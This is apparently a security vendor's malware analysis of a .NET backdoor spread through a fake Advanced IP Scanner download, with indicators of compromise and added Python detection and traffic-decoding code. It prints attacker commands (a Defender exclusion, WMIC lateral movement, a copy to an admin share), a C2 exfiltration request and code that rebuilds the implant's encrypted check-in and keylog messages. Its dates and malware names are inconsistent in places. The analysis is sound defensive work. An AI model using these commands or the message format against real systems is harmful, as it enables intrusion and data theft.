In TRU Positives, eSentire’s Threat Response Unit (TRU) provides a summary of a recent threat investigation. We outline how we responded to the confirmed threat and what recommendations we have going forward.
Here’s the latest from our TRU Team…
Latest Update: January 12th, 2023 - The backdoor reported by @G60930953 is identified as ThunderShell, an open-source RAT available on GitHub. ConnectWise, naming it Parcel RAT, and Mandiant, calling it SMOKEDHAM, have also reported on this malware.
In November 2023, eSentire’s Threat Response Unit (TRU) detected WorkersDevBackdoor malware impacting a customer in the business services industry. This malware spreads through malicious online ads that trick users into downloading it by mimicking legitimate software. Once installed, it secretly collects sensitive information and provides backdoor access to the infected system. The full infection chain, including the suspicious PowerShell command, is shown in Figure 1.
The initial infection vector was a drive-by download via a Google Search advertisement. Advertising lets an attacker reach a chosen audience, such as network administrators, without knowing their email addresses (which malware delivered by email would require). Compounding the problem are the implicit trust that the ad platform filters out malicious content and security awareness programs that focus on email.
In this case, the user had searched for the Advanced IP Scanner application and downloaded the malicious installer from an imposter website at advanced-ip-scanners[.]net. The malicious installer was created using NSIS (Nullsoft Scriptable Install System), an open-source system used to create Windows installers. Upon unpacking the installer, we see the ZIP archive named WindowsDev.7z.
NSIS-generated installers embed an NSIS.ini script that automates the installation process. The script can be listed with 7-Zip, but recent 7-Zip versions no longer expose it, so we use an older release (7-Zip 9.38) instead.
The [NSIS].ini script performs the actions listed in Figure 3.
The batch file NodejsToolsVsix.bat contains the code to set the PowerShell Path. It sets a variable LinkRunPS to the default PowerShell path. This is used to ensure the script uses the correct version of PowerShell. The IF statement checks the system architecture and adjusts the PowerShell path if the system is 64-bit. Then it executes the batch script via InvokeScript (Figure 6).
Let’s briefly look at the PowerShell script. The command “$UMGHyr0wTZa2 = convertto-securestring -String $k2FJj7u5G1vW -Key ($5ob67dVlTngs)” creates a SecureString with the ConvertTo-SecureString cmdlet: it decrypts the data (2) held in $k2FJj7u5G1vW using the key (1) held in $5ob67dVlTngs. The last line (3) calls the static method HMEqRPzgHocKlu on the class RZjKVf.ovbEFleTI, which is defined in the injected code. The method takes three parameters, including a URL and two other strings (Figure 7).
The encrypted data is the .NET payload that gets loaded in memory upon the execution of the PowerShell script.
In Figure 8 we see the function responsible for creating a seed for the random number generator. The seed is the bitwise XOR of the current process ID and the number of seconds since January 1, 1970 (Unix epoch time), which makes the seed vary between infections. The conditional statement “if (fzBoRxFO == 0) { fzBoRxFO = random.Next(1, 16); }” determines the length of the generated string.
If the fzBoRxFO parameter is 0, the length is set to a random value between 1 and 15. The “for” loop iterates 15 times, each time appending a randomly selected character from the text string to a StringBuilder object. The generated string is then used as part of the URL path for the POST requests that send the victim’s data to the C2. The same function also generates the unique ID under which the infected machine communicates with the C2.
You can see the example of randomly generated strings in traffic capture in Figure 9.
The function in Figure 10 creates a formatted string consisting of the string “register” and the unique ID created earlier. The method ZyKZ() combines the computer name, user domain, and username into a single string, which is appended to the formatted string and sent to the C2 upon initial infection (registering the infected host).
The formatted string is then encrypted with RC4 with the hardcoded key in the PowerShell script, gets base64-encoded, and is sent out to C2 in the following JSON format:
The script sleeps for 1000 milliseconds and awaits the response/further commands from C2. The commands from C2 are also RC4-encrypted with the same key and base64-encoded. The first automated command from C2 is “whoami”.
After each response from the C2, the script sleeps for the interval assigned in the PowerShell script (75000 milliseconds in our case). Approximately 6-10 minutes after the malicious payload executed, we observed the threat actor running the following commands on the infected host:
- net user
- nslookup -type=srv _ldap._tcp.<redacted>
- systeminfo
- whoami
- "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\
- "C:\Windows\System32\Wbem\WMIC.exe" /node:<redacted> process call create "cmd.exe /c c:\programdata\Microsoft\LogConverter\Microsoft.NodejsTools.PressAnyKey.lnk" (the threat actor attempted to move laterally to another host via WMIC)
- "C:\Windows\system32\xcopy.exe" c:\programdata\microsoft\LogConverter \\<redacted>\C$\programdata\Microsoft\LogConverter /E /H /Y (the threat actor attempted to copy the malicious files to another host)
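The commands above are exactly the kind of process-creation telemetry an EDR or Sysmon feed records, and each of the last three is a strong signal on its own. As an added illustration (this is not eSentire code and not the BlueSteel classifier mentioned later), the following Python scorer runs a handful of command-line rules over constructed log lines modelled on this list. The rule names and weights, the host name WS-FIN-07, the domain corp.example and the wording of the PowerShell loader line are assumptions; the variable and class names in that line are the ones quoted earlier in this post.

```python
import re

# Each rule: (name, pattern, weight). Weights are the author's assumptions; the
# patterns follow the techniques seen in this case: a fileless PowerShell loader
# using ConvertTo-SecureString -Key, a Defender exclusion for the whole drive,
# remote process creation through WMIC, and copying to an admin share.
RULES = [
    ("ps_securestring_key",
     re.compile(r"convertto-securestring\b.*-key\b", re.I), 4),
    ("defender_exclusion_drive_root",
     re.compile(r"add-mppreference\b.*-exclusionpath\s+[a-z]:\\?(\s|$|\")", re.I), 5),
    ("wmic_remote_process_create",
     re.compile(r"wmic(\.exe)?\"?\s+/node:\S+\s+process\s+call\s+create", re.I), 5),
    ("copy_to_admin_share",
     re.compile(r"(xcopy|copy|robocopy)(\.exe)?\"?\s.*\\\\[^\\\s]+\\[a-z]\$\\", re.I), 4),
    ("lnk_under_programdata",
     re.compile(r"programdata\\.*\.lnk\b", re.I), 2),
    ("ad_srv_recon",
     re.compile(r"nslookup\s+-type=srv\s+_ldap\._tcp", re.I), 1),
]


def triage(cmdline):
    """Score one process command line; returns (score, matched rule names)."""
    hits = [name for name, rx, _ in RULES if rx.search(cmdline)]
    score = sum(w for name, _, w in RULES if name in hits)
    return score, hits


def suspicious(cmdlines, threshold=4):
    """Return (score, hits, cmdline) for lines at or above the threshold, highest first."""
    scored = [(*triage(c), c) for c in cmdlines]
    return sorted((t for t in scored if t[0] >= threshold), key=lambda t: -t[0])


# Constructed sample log lines, modelled on the command list above. The host
# name, domain and loader command text are made up for the example.
SAMPLE_CMDLINES = [
    "net user",
    "nslookup -type=srv _ldap._tcp.corp.example",
    "systeminfo",
    "whoami",
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:' + "\\",
    r'"C:\Windows\System32\Wbem\WMIC.exe" /node:WS-FIN-07 process call create '
    r'"cmd.exe /c c:\programdata\Microsoft\LogConverter\Microsoft.NodejsTools.PressAnyKey.lnk"',
    r'"C:\Windows\system32\xcopy.exe" c:\programdata\microsoft\LogConverter '
    r'\\WS-FIN-07\C$\programdata\Microsoft\LogConverter /E /H /Y',
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -c '
    r'"$s = convertto-securestring -String $k2FJj7u5G1vW -Key ($5ob67dVlTngs); '
    r'[RZjKVf.ovbEFleTI]::HMEqRPzgHocKlu($u, $a, $b)"',
]

if __name__ == "__main__":
    for score, hits, cmd in suspicious(SAMPLE_CMDLINES):
        print(f"{score:2d} {','.join(hits):45s} {cmd[:70]}")
```

Plain discovery commands (net user, systeminfo, whoami) score low on their own; the value of the scorer is that the Defender exclusion, the remote WMIC execution and the copy to an admin share rise to the top even when the loader line itself is missed.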
We have named the .NET backdoor “WorkDevBackdoor”. The backdoor also has keylogger functionality and retrieves the title of the currently active window (Figure 11). The captured input is then base64-encoded and appended with the GUID parameter of the infected host along with the string “userinput”.
Here is an example of the POST request sent to the C2:
POST hxxps://cdn-us-tech.wtf-system-4758995.workers[.]dev/MsB0h/ HTTP/1.1
User-Agent: Microsoft Windows NT 10.0.16299.0
Content-Type: application/json
Host: cdn-us-tech.wtf-system-4758995.workers[.]dev
Content-Length: 131
Expect: 100-continue
Connection: Keep-Alive

{"UUID":<REDACTED>,"ID":"sMsB0hNEMIglZ8J8","Data":"<base64-encoded string>"}
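Because the RC4 key is hard-coded in the recovered PowerShell script and the same key is used in both directions, every request and response captured in a PCAP can be decrypted offline to scope what the backdoor registered, which commands it received and what keystrokes it uploaded. The following Python code is an added example (not eSentire's tooling and not the malware's code) that implements the RC4-then-base64 layout described above for both sides of the exchange. Only the JSON field names and the "ID" value come from the request above; the key, UUID, host details and the separators inside the plaintext are constructed assumptions.

```python
import base64
import json


def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 keystream XOR (KSA + PRGA). Encryption and decryption are the same call."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


# Constructed values: the real key and UUID are not on the page.
KEY = b"constructed-example-key"
UUID = "00000000-1111-2222-3333-444444444444"
SESSION_ID = "sMsB0hNEMIglZ8J8"   # the "ID" value from the POST shown above


def encode_message(plaintext: str, key: bytes = KEY) -> str:
    """Build a body in the observed layout: RC4 over the text, then base64 in "Data"."""
    data = base64.b64encode(rc4(key, plaintext.encode("utf-8"))).decode("ascii")
    return json.dumps({"UUID": UUID, "ID": SESSION_ID, "Data": data})


def decode_message(body: str, key: bytes = KEY) -> dict:
    """Parse a captured body and return its fields with "Data" decrypted."""
    msg = json.loads(body)
    plain = rc4(key, base64.b64decode(msg["Data"])).decode("utf-8")
    return {"UUID": msg["UUID"], "ID": msg["ID"], "Data": plain}


def register_body(computer: str, domain: str, user: str) -> str:
    """Initial check-in: "register" plus the host ID, then computer name, user
    domain and username. The '|' separator is an assumption; the page does not
    show the exact joining format."""
    return encode_message(f"register {SESSION_ID} {computer}|{domain}|{user}")


def keylog_body(captured: str, window_title: str) -> str:
    """Keylogger upload: captured input base64-encoded, sent with the host GUID
    and the string "userinput" (field order is an assumption)."""
    blob = base64.b64encode(captured.encode("utf-8")).decode("ascii")
    return encode_message(f"userinput {UUID} {window_title} {blob}")


def c2_command(body: str) -> str:
    """Decrypt a C2 response (same key, same base64+RC4 layout) to its command text."""
    return decode_message(body)["Data"]


if __name__ == "__main__":
    # Both sides of the exchange, with constructed data.
    reg = register_body("WS-FIN-07", "CORP", "jdoe")
    print("implant -> C2:", reg)
    print("decoded      :", decode_message(reg)["Data"])
    task = encode_message("whoami")        # the first automated task from the C2
    print("C2 -> implant:", c2_command(task))
```

When applying this to real captures, the key is the one passed to the RC4 routine in the de-obfuscated PowerShell script, and the "Data" field is the only encrypted part of the body; "UUID" and "ID" are sent in the clear and make good pivot values for correlating sessions across a capture.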
We did some research and found a similar chain of infection described by @0xBurgers (Figure 12).
You can access the Yara rules for WorkDevBackdoor here.
Our machine-learning powered PowerShell classifier, BlueSteel, detected the execution of the suspicious PowerShell command.
Our team of 24/7 SOC Cyber Analysts isolated the affected host, contained the threat and notified the customer of suspicious activities.
Protecting against malware requires a multi-layered defense approach to defend endpoints from malware and detect or block unauthorized login activity against applications and remote access services. Therefore, we recommend:
| Name | Indicator (MD5 hash or C2 domain) |
| --- | --- |
| Advanced_IP_Scanner_2.5.4594.1 | 521210e39b5b8364d34e62cb3cb9e9cd |
| LogConverter | a607e92aa155168de57e39d3b0d1b7e0 |
| Microsoft.NodejsTools.PressAnyKey.exe | 1b1ec901b4f4374d361d4839d0e53523 |
| Microsoft.NodejsTools.PressAnyKey.lnk | f6f4b821716053e03c911417ef1c2c99 |
| CG6oDkyFHl3R.t | 646ed75ae910483b8ee009b23d83d4e0 |
| q8DTE1uLaXRG.t | 6180c6c92c0eba74f9871863d308c8cb |
| WorkDevBackdoor | d606255c411445b210ecd437faa6b43e |
| WorkDevBackdoor C2 | cdn-us-tech.wtf-system-4759011.workers[.]dev |
| WorkDevBackdoor C2 | cdn-us-tech.wtf-system-4758995[.]workers.dev |
The eSentire Threat Response Unit (TRU) is an industry-leading threat research team committed to helping your organization become more resilient. TRU is an elite team of threat hunters and researchers that supports our 24/7 Security Operations Centers (SOCs), builds threat detection models across the eSentire XDR Cloud Platform, and works as an extension of your security team to continuously improve our Managed Detection and Response service. By providing complete visibility across your attack surface and performing global threat sweeps and proactive hypothesis-driven threat hunts augmented by original threat research, we are laser-focused on defending your organization against known and unknown threats.